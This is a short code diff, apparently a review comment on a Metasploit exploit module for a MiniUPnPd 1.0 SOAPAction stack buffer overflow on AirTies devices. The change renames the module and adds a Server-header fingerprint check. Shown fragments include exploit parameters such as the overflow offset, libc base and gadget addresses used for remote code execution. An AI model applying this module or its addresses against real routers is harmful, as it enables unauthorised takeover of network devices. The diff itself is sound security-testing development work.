fingerprint, title

Author: m-1-k-3

modules/exploits/linux/upnp/airties_miniupnpd_soap_bof.rb

@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
+      'Name'           => 'AirTies MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
       'Description'    => %q{
           This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
         present in the SOAPAction HTTP header handling.
@@ -41,8 +41,9 @@ def initialize(info = {})
             {
               'Offset'     => 2048,
               'LibcBase'   => 0x2aabd000,
-              'System'     => 0x00031AC0 ,
-              'CallSystem' => 0x0001CC94   # prepare $a0 and jump to $s0
+              'System'     => 0x00031AC0,
+              'CallSystem' => 0x0001CC94,   # prepare $a0 and jump to $s0
+              'ServerHeader' => "AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0"  # Fingerprint
             }
           ],
         ],
@@ -62,7 +63,7 @@ def check
       'uri'		 => "/",
       })
 
-      if res && res.headers['Server'] =~ /miniupnpd\/1.0/
+      if res && res.headers['Server'] == target['ServerHeader']
         return Exploit::CheckCode::Detected
       end
     rescue ::Rex::ConnectionError
@@ -74,6 +75,7 @@ def check
 
   def exploit
     print_status("#{peer} - Accessing the vulnerable URL...")
+    print_status(target['ServerHeader'])
 
     unless check == Exploit::CheckCode::Detected
       fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")